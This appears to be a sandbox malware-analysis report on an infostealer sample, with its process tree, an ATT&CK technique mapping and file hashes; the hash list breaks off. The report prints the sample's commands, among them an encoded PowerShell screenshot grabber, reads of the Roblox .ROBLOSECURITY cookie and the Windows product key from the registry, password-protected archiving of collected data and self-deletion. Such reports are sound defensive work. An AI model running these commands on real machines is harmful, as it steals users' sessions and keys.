bgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1644
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xxunv3lg\xxunv3lg.cmdline"
        5⤵
        
        PID:4456
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES950C.tmp" "c:\Users\Admin\AppData\Local\Temp\xxunv3lg\CSC2E8BAF2C326D4169AC9AE5824EB28D.TMP"
        6⤵
        
        PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3160
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2236
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2368
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1700
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3420
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:412
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4388
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3152
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2088
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14602\rar.exe a -r -hp"mudi" "C:\Users\Admin\AppData\Local\Temp\Ra82i.zip" *"
    3⤵
    PID:4036
  - - C:\Users\Admin\AppData\Local\Temp\_MEI14602\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI14602\rar.exe a -r -hp"mudi" "C:\Users\Admin\AppData\Local\Temp\Ra82i.zip" *
      4⤵
      Executes dropped EXE
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2160
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2664
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2800

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcc812cc40,0x7ffcc812cc4c,0x7ffcc812cc58
  2⤵
  PID:1372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1996,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2
  2⤵
  PID:4440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3
  2⤵
  PID:2816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:4780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4876,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:2864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5172 /prefetch:8
  2⤵
  PID:3220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:8
  2⤵
  PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4860,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5072 /prefetch:2
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5076,i,5791679534942226764,5873001706412971854,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=864 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:772

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
b97aa8e1706e6a3b38af8cc78f9650cd

SHA1
e8c13be15c5028adba06cc1472031d9272c111f3

SHA256
3bdcbfe2c564cef69300ae86938255ec01a2ef429015d8c32ec70d615055028d

SHA512
dd6016a026f65cb667b45c04763b1cfd52eca8453a54aaf7e756b623d16bd61004252684f2f4349900ff9e14f982e01664d4ec8cf1a41ab83dd886fb40811b2c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
e354848162cfd8c455ef4dc7c1c89e00

SHA1
d9b912195f7b6f08056dc4315211a980a1ff2bbb

SHA256
bd39bb9bf3df4f8cb480c570cb3b1f52e45f627704c773023cd68ec6e097f1df

SHA512
b3b7337a2603180dad285981e34895d3bfe2baeceb7cf15a6d76560f1c82c531a32917c9260061f52e6e82da043794cbec016be76b7b91c168cd48e355e7f276

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
34317fdb8ae50906c55b82445ce6776f

SHA1
38d262eb35c9cc25350bd95fa0fc3cb9f070744b

SHA256
afe077ca72ae97e690d49dc7e4cbccfecfdf17c470621f8b50d89d70bff91f5b

SHA512
8764cff1b19666170daf89fb0c97dc345e05f7f4b58b6057fb8c5c63e89aeacb7fbeb051f0e89744489686868174c138f2cf34c992963241daef9df846963045

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a91601921b160257c038d4efc247609d

SHA1
cc7e31c16e3cf2ebb60a81255335851fd24cc776

SHA256
1680bc6bd29a875e36b25311397be9b1331681466e244e529acf0e4094762f8c

SHA512
